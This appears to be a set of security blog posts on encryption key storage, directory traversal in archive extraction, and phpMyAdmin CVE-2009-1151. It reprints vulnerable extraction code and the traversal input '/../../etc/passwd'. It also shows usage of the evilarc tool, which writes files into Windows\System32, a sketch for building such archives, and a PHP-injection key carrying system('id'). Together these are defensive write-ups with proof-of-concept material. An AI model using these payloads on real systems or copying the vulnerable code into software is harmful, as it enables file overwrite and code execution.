Now, Where Did I Leave My Keys…

By: Greg Ose

Even with the best intentions, secure storage of sensitive information is a common architectural issue that corporations typically overlook when developing applications. While you may be using AES with a 256-bit key and can advertise your industry-standard, cutting-edge, crypto-hacker defenses, you may still be exposing your data and your customers’ data to significant risk. You need to ask yourself the question: “Where exactly did I leave those keys?”

All too often on pen tests we obtain significant privileges within a client’s network. While the issues leading to this are completely out of scope for this post, you need to start thinking about what an attacker could compromise once they have free rein of your network. What are your key assets and how are you protecting them? Typically, the answer to the former will include client information, be it PII or credit card related information, and the answer to the latter is “we encrypt it.” Unfortunately, “we encrypt it” is usually only completely understood by the handful of developers who wrote the code to do the encryption. They received the requirement specs to do encryption, maybe even requirements detailed enough to specify a well-established crypto algorithm and key size, wrote the code using standard and well-regarded libraries, and moved on to the next requirement. But ask yourself, were there any requirements around where the encryption keys should be stored?

During pen tests, once we have established that encrypted information is being stored, the task becomes working out which algorithm is being used and where the associated keys are. If you know a company is making the effort to encrypt something, it’s probably a decent target to go after. Fortunately for us, and our looming lunch break, there are usually only a handful of places we need to look:

    The database or configuration file – Usually by the time we have access to encrypted data, we have full access to the host storing the data or running the application. If we only have to look one directory up for a configuration file or at another table in the database for the encryption key, you might as well have base64 or rot13 encoded the data. By the way, this includes any configuration options you may be storing in the registry or other locations on the host.

    The application source code – In a compromised environment, source code repositories or file shares containing source archives are always an interesting target. We can start to understand your applications better and figure out exactly how encryption or decryption is being done. If your source code contains hard-coded encryption keys, this process can easily be reversed and executed by us in our own program.

    The application binaries / compiled libraries – If your source repository is locked down and access to source is unavailable, compiled application binaries or libraries are always going to be accessible. Even during a short-term pen test, a skilled pentester will be able to throw the mycrypt.dll library into IDA and search for the 32-byte static array you used to store your key. Even more conveniently, a pentester may just be able to import the library and call its decrypt(byte[]) function for instant decryption.

While these may be worst-case scenarios for storing encryption keys, they are what we almost always see in use within corporate environments.
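To give a feel for how little effort a static key in a binary or configuration blob buys you, here is a minimal sketch in Python. It is not the IDA workflow mentioned above; it swaps in a simpler technique, a sliding-window entropy scan, on the assumption that key material looks far more random than the code and strings around it. The function names, the 32-byte window, and the 4.5 bits-per-byte threshold are all illustrative choices, not values from any real tool.

```python
import math
from collections import Counter


def shannon_entropy(chunk: bytes) -> float:
    """Return the Shannon entropy of chunk in bits per byte."""
    counts = Counter(chunk)
    total = len(chunk)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def find_key_candidates(blob: bytes, key_len: int = 32, threshold: float = 4.5) -> list[int]:
    """Return offsets of key_len-byte windows whose entropy meets the threshold.

    A 32-byte window can reach at most 5 bits per byte (all bytes distinct),
    so a threshold of 4.5 is an assumed cut-off for "looks like key material".
    """
    return [
        offset
        for offset in range(len(blob) - key_len + 1)
        if shannon_entropy(blob[offset:offset + key_len]) >= threshold
    ]


if __name__ == "__main__":
    # Hypothetical "binary": padding, an embedded 256-bit key, more padding.
    key = bytes(range(0x10, 0x30))
    blob = b"\x00" * 64 + key + b"config=1;" * 10
    print(find_key_candidates(blob))
```

Windows that only partly overlap the key are reported as well, so the result is a short list of offsets to inspect by hand rather than a single answer. Compressed or already encrypted data will also score highly, which is why this is only a first pass.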

So where should these keys be stored? Unfortunately, there is no clear-cut answer. This is the most difficult problem when providing encryption in your applications: if decryption needs to be done in an automated fashion (which is almost always a requirement), you need to fully trust the application performing the decryption. That seems like common sense, but how can you trust the application if you assume the environment has been compromised? For this problem, the only option you have is to make obtaining the encryption key harder, though not impossible, for an attacker. A best-case implementation of this involves sending your data to an HSM (hardware security module) to perform the encryption and decryption. However, you still trust your application and environment to authenticate and access the HSM for this functionality. This process can be obfuscated and expanded to include numerous steps, but ultimately you still run into the core trust issue of the environment. This is the same problem that digital media producers and software publishers have been fighting for years with DRM protection, their code or media being the equivalent of your or your users’ sensitive data.

While not perfect, removing immediate access to encryption keys and delegating this access to a separate host lets you implement more complete security controls around the host managing the keys. For example, if the entire Windows domain is compromised, you can ensure that the host storing keys is not part of this domain and has limited, or preferably no, access by users. In-house at Neohapsis, we are working on developing an easy-to-use, open-source server that can be utilized to provide this out-of-band key management. This will be an extension to existing libraries to provide remote key storage. No promises on when it will be released (sorry, we have to be billable!), but hopefully it will offer developers an easy way to implement better key storage and security within their applications.

Directory Traversal in Archives

By: Greg Ose and Patrick Toomey

I’m sure at the top of everyone’s list of New Year’s resolutions is the ever-forgotten “I will write more secure code,” and it seems that each year this task gets harder. With more complex and abstracted frameworks and APIs, the ways security-related bugs are introduced into a code base have become equally complex and abstracted. Being a few months into 2009, hopefully we can help you catch up on your resolutions by presenting something else to look for when reviewing or writing secure code.

In recent engagements, we have run into a slew of issues focusing around the well-known vulnerability of directory path traversal. As a refresher, this typically involves injecting file path meta-characters into a filename string to reference arbitrary files and usually results in the modification or disclosure of files on the system. For example, a user supplies the filename /../../etc/passwd which is appended to the path /tmp/uploaded_pictures and ends up referencing the password file instead of a file under the intended directory.
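The refresher example above can be reproduced in a few lines of Python. This is only an illustration of how the path resolves; the helper name resolve_upload_path is hypothetical, and posixpath is used so the result is the same regardless of the host platform.

```python
import posixpath


def resolve_upload_path(base_dir: str, user_filename: str) -> str:
    """Naively append a user-supplied filename and collapse any '..' segments."""
    return posixpath.normpath(base_dir + user_filename)


if __name__ == "__main__":
    # The traversal from the example: two '..' hops climb out of the upload directory.
    print(resolve_upload_path("/tmp/uploaded_pictures", "/../../etc/passwd"))  # /etc/passwd
    # A benign filename stays under the intended directory.
    print(resolve_upload_path("/tmp/uploaded_pictures", "/cat.jpg"))
```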

We all know, or at least should know, what a typical directory traversal vulnerability and exploit look like. However, we have recently seen these issues manifest themselves in the handling of user-provided archive files instead of file path strings. Typically, these user-provided files are sent via HTTP uploads. Almost all of the common high-level application APIs provide a means, or a third-party library, to handle archive files. Additionally, almost none of these libraries check for potential directory path traversal when they extract these files. This puts the liability on the developer to check for malicious archives. While file operation calls with a user-controlled variable may be obvious, filenames within user-controlled archives may be the vulnerability that slips by. Developers should not only validate user-supplied file paths for directory traversal, but also check file paths included in archive files. As a note, this type of vulnerability has been mentioned before and is not groundbreaking by any means, but we want to take a detailed look at what to be aware of as a developer and how to test for this during vulnerability assessments.

To get started, let’s take a look at an example provided by Sun themselves (!!!) in a technical article for the java.util.zip package. Code Sample 1 from the article provides their base example for extracting an archive and is shown below.

import java.io.*;
import java.util.zip.*;

public class UnZip {
  static final int BUFFER = 2048; // static so that main() can reference it
  public static void main (String argv[]) {
    try {
      BufferedOutputStream dest = null;
      FileInputStream fis = new FileInputStream(argv[0]);
      ZipInputStream zis = new ZipInputStream(
                               new BufferedInputStream(fis));
      ZipEntry entry;
      while((entry = zis.getNextEntry()) != null) {
        System.out.println("Extracting: " +entry);
        int count;
        byte data[] = new byte[BUFFER];
        // write the files to the disk
        FileOutputStream fos = new FileOutputStream(
                                   entry.getName());
        dest = new BufferedOutputStream(fos, BUFFER);
        while ((count = zis.read(data, 0, BUFFER)) != -1) {
          dest.write(data, 0, count);
        }
        dest.flush();
        dest.close();
      }
      zis.close();
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}

We can see where the vulnerability manifests itself in processing each entry of the provided ZIP file:

FileOutputStream fos = new FileOutputStream(entry.getName());

entry is the current ZIP entry being processed and getName() returns the filename stored in that entry. After retrieving this filename, the uncompressed data is written to the path it names. We can see that by using directory traversal in the filename, a malicious user may be able to make arbitrary writes anywhere on the filesystem. Unfortunately, on most platforms, if an attacker can arbitrarily write files they can most likely also get arbitrary code executed on the affected server.

Similar issues exist with a number of ZIP library implementations across various languages. As one might expect, the equivalent Python code is far less verbose. While Python doesn’t provide any sample code, a simple, and vulnerable, ZIP extraction would look as follows:

from zipfile import ZipFile
import sys
zf = ZipFile(sys.argv[1])
zf.extractall()

The extractall method does what one would expect it to do, except that it does not check for directory traversal in the ZIP entries’ file paths. Python also provides equivalent objects for handling tar archives. Interestingly, the tar archive library documentation does make mention of the risk associated with path traversal within archive files. The documentation for the extractall method states:

Warning: Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with “/” or filenames with two dots “..”.

How about PHP? Surely they provide a function to work with ZIP files (what don’t they have a function for?). The PHP manual provides the following example code for extracting ZIP files.

<?php
$zip = new ZipArchive;
$res = $zip->open('test.zip');
if ($res === TRUE) {
  echo 'ok';
  $zip->extractTo('test');
  $zip->close();
} else {
  echo 'failed, code:' . $res;
}
?>

Sure enough, this code is also vulnerable to file path manipulation within the archive.

What about everyone’s favorite language du jour, Ruby? Ruby itself does not have ZIP file extraction built into the language’s core library. However, rubyzip is a popular third-party library and, like the prior libraries, is also vulnerable to directory traversal. The example below was given in a post by the library’s author as the way to extract a ZIP file and all of its directories:

require 'rubygems'
require 'zip/zipfilesystem'
require 'fileutils'

OUTDIR="out"

Zip::ZipFile::open("all.zip") {
  |zf|

  zf.each { |e|
    fpath = File.join(OUTDIR, e.name)
    # Create the parent directory before extracting into it
    FileUtils.mkdir_p(File.dirname(fpath))
    zf.extract(e, fpath)
  }
}

Finally, similar to Ruby, the .NET environment does not have ZIP archive handling built into the core library. A quick googling for “.Net zip files” leads to an article on MSDN. In this article, the authors detail this gap in the .NET library and then go on to present a solution. The tools released include a signed DLL for use during development and a set of command-line utility programs that utilize the library. One of these command-line utilities is Unzip.exe. Sure enough, Unzip.exe is vulnerable to path traversal within an archive. No warning is presented and the archive is extracted without regard for the fully resolved path of the files within the archive.

How do mainstream, standalone compression utility programs handle this vulnerability? We tested a large number of archive extraction programs (WinZip, WinRAR, command-line Info-ZIP, unzip on Unix, etc.) and noted that all of them either provide a warning when a ZIP file entry contains directory traversal, escape the meta-characters, or just ignore the traversed directory path altogether.

When writing code that interacts with archives, the developer must take the same precautions used by mainstream extraction utilities. As with any user-controlled input, the file and directory names in an archive should be validated before being passed to any file operation. The developer should verify that path traversal characters do not occur in any entries within the archive. Similarly, the developer may also leverage utility functions within their language to first determine the fully resolved path before extracting an entry (e.g., os.path.normpath(path) in Python).
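As a minimal sketch of that kind of pre-extraction check, the Python below resolves each entry against the destination directory and reports anything that would land outside it. The helper names escapes_root and find_unsafe_members are hypothetical, and treating backslashes as separators on every platform is an assumption made to catch Windows-style entries.

```python
import os
import zipfile


def escapes_root(root, entry_name):
    """Return True if entry_name would resolve to a path outside root."""
    # Treat backslashes as separators so Windows-style entries are caught on any host.
    candidate = entry_name.replace("\\", "/")
    target = os.path.realpath(os.path.join(root, candidate))
    try:
        return os.path.commonpath([root, target]) != root
    except ValueError:
        # Raised on Windows when the two paths are on different drives.
        return True


def find_unsafe_members(archive, dest_dir):
    """List the entries of a ZIP archive that would be written outside dest_dir."""
    root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(archive) as zf:
        return [name for name in zf.namelist() if escapes_root(root, name)]
```

A caller would refuse to extract the archive if the returned list is non-empty. Comparing fully resolved paths, rather than searching the name for "..", also catches absolute entry names.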

A more drastic mitigation, though perhaps the better long-term solution, would involve modifying these default libraries to work similarly to their standalone application counterparts by default. It is extremely rare to require path traversal characters in a legitimate archive. Perhaps, the libraries should be modified to secure the common case, requiring a developer to explicitly request the atypical case. For example, what if the Python ZipFile object changed its default behavior to throw an exception in the presence of file traversal characters? The extractall method signature could be modified as follows:

ZipFile.extractall([path[,members[,pwd[,allow_traverse]]]])

By default, allow_traverse would be set to False, and zipfile.BadZipfile would be thrown if path traversal characters are encountered. This would provide a secure-by-default configuration for the library while still allowing the existing behavior if necessary. The developer would have to explicitly request support for path traversal, which mitigates accidental and insecure usage. This is unlikely to impact existing code, as archives with path traversal characters are not easy to create and it is extremely unlikely that a legitimate archive would accidentally include such characters.
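The proposal can be approximated today without touching the standard library. The subclass below is a hypothetical sketch, not an existing Python API: SafeZipFile and its allow_traverse keyword are names made up for illustration, and it raises zipfile.BadZipFile, the current spelling of BadZipfile.

```python
import os
import zipfile


class SafeZipFile(zipfile.ZipFile):
    """ZipFile whose extractall() rejects traversal entries unless explicitly allowed."""

    def extractall(self, path=None, members=None, pwd=None, allow_traverse=False):
        if members is not None:
            members = list(members)  # allow two passes over an iterator
        if not allow_traverse:
            root = os.path.realpath(os.getcwd() if path is None else path)
            for member in (self.namelist() if members is None else members):
                name = member.filename if isinstance(member, zipfile.ZipInfo) else member
                # Treat backslashes as separators so Windows-style entries are caught too.
                target = os.path.realpath(os.path.join(root, name.replace("\\", "/")))
                try:
                    inside = os.path.commonpath([root, target]) == root
                except ValueError:  # e.g. different drives on Windows
                    inside = False
                if not inside:
                    raise zipfile.BadZipFile("path traversal in entry: %r" % name)
        super().extractall(path, members, pwd)
```

The check runs over every entry before anything is written, so a malicious archive is rejected without leaving a partial extraction behind. Note that current Python releases already strip ".." components and leading slashes during extraction, so passing allow_traverse=True here only skips the extra check and does not bring back the old behavior.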

During the course of this write-up we grew tired of hand-editing ZIP archives in a hex editor to add directory traversal characters. So, we put together a Python script that can be used to generate archives with path traversal sequences automatically inserted. It can build traversal paths for both Unix and Windows environments, for ZIP files (including jar) and for tar files with and without compression (gzip or bzip2). You can specify an arbitrary number of directories to traverse and an additional path to append (think var/www or Windows\System32). The full usage follows:

$ ./evilarc.py --help
Usage: evilarc <input file>

Create archive containing a file with directory traversal

Options:
  --version      show program's version number and exit
  -h, --help     show this help message and exit
  -f OUT, --output-file=OUT
                 File to output archive to.  Archive type is
                 based off of file extension.  Supported
                 extensions are zip, jar, tar, tar.bz2, tar.gz,
                 and tgz.  Defaults to evil.zip.
  -d DEPTH, --depth=DEPTH
                 Number directories to traverse. Defaults to 8.
  -o PLATFORM, --os=PLATFORM
                 OS platform for archive (win|unix). Defaults
                 to win.
  -p PATH, --path=PATH  Path to include in filename after
                 traversal.  Ex:WINDOWS\System32\

The following example shows the file test.txt being added to an archive and extracted to the C:\Windows\System32 directory through the vulnerable Java class we previously discussed:

$ ./evilarc.py test.txt -p Windows\\System32\\
Creating evil.zip containing ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ java javaunzip evil.zip
Extracting: ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ ls -al /cygdrive/c/Windows/System32/test.txt
-rwxr-x---+ 1 gose mkgroup-l-d 21 Feb 24 11:52 /cygdrive/c/Windows/System32/test.txt

We have made the script available for download here:

https://github.com/Neohapsis/evilarc
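For readers who only want the core idea, the sketch below shows one way such an archive can be built with Python's zipfile module. It is not the evilarc source: the function names are hypothetical, only ZIP output is covered, and the defaults (depth 8, Windows separators) simply mirror the usage text above.

```python
import zipfile


def traversal_name(filename, depth=8, platform="win", path=""):
    """Prefix filename with `depth` parent-directory hops plus an optional path."""
    sep = "\\" if platform == "win" else "/"
    return (".." + sep) * depth + path + filename


def write_traversal_zip(out, filename, data, **kwargs):
    """Write a one-entry ZIP whose stored name contains traversal sequences.

    `out` may be a path or a file-like object; the requested entry name is returned.
    """
    name = traversal_name(filename, **kwargs)
    with zipfile.ZipFile(out, "w") as zf:
        # writestr stores the name as given, apart from converting the host's
        # own path separator to "/".
        zf.writestr(name, data)
    return name


if __name__ == "__main__":
    print(write_traversal_zip("evil.zip", "test.txt", b"hello", path="Windows\\System32\\"))
```

Because zipfile converts the host's own separator to a forward slash, a Windows-style name is best generated on a Unix-like host, as in the Cygwin session above.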

About CVE-2009-1151

During an evaluation of tools for internal use, we took a look at phpMyAdmin. During the assessment, we identified that the scripts/setup.php script is used to generate a configuration file at config/config.inc.php. Any time PHP code is being generated, extremely careful filtering must be done to ensure that the intended output cannot be escaped and will not allow the injection of arbitrary code.

While the most obvious inputs, those set by the configuration fields, were escaped properly, other attacker-accessible data was not. The script passes PHP serialized data back and forth through the configuration parameter. When a save action is performed, this data is then written as PHP variables to the configuration file. The data contains associative arrays with key and value pairs. On output, the values are properly escaped using addslashes; however, the keys, which are also output, are not filtered. By modifying the array keys in the serialized data passed to a save POST request, the key name can be escaped and arbitrary PHP code injected. If config/ is writable by the web server user, the config.inc.php file is written to it and can be executed directly out of the document root.
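The pattern is easy to reproduce in miniature. The Python sketch below is not phpMyAdmin's code; it is a hypothetical generator that emits PHP assignments with the same flaw (values escaped, keys written verbatim), next to a variant that rejects any key outside an assumed whitelist of letters, digits and underscores.

```python
import re


def php_quote(value: str) -> str:
    """Escape backslashes and single quotes for a PHP single-quoted string."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def render_vulnerable(settings: dict) -> str:
    """Emit PHP assignments; values are escaped but keys are written verbatim."""
    return "\n".join(f"$cfg['{k}'] = '{php_quote(v)}';" for k, v in settings.items())


KEY_PATTERN = re.compile(r"[A-Za-z0-9_]+")  # assumed whitelist for key names


def render_safer(settings: dict) -> str:
    """Same output, but refuse any key that is not a plain identifier."""
    lines = []
    for k, v in settings.items():
        if not KEY_PATTERN.fullmatch(k):
            raise ValueError("illegal configuration key: %r" % k)
        lines.append(f"$cfg['{k}'] = '{php_quote(v)}';")
    return "\n".join(lines)


if __name__ == "__main__":
    evil_key = "x'] = 1; system('id'); $cfg['y"
    # The key closes the quoted string early, so system('id') becomes live PHP.
    print(render_vulnerable({evil_key: "value"}))
```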

The issue was disclosed to the phpMyAdmin team and they did an amazing job responding to this disclosure with a patch out in less than 24 hours!

Lessons learned? Any time you are programmatically generating code (be it HTML, JavaScript, PHP, etc.), ensure that your output is properly filtered, and make sure all installation scripts and unneeded administration tools are removed.

References:
Advisory: http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
Patch: http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12301
CVE: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1151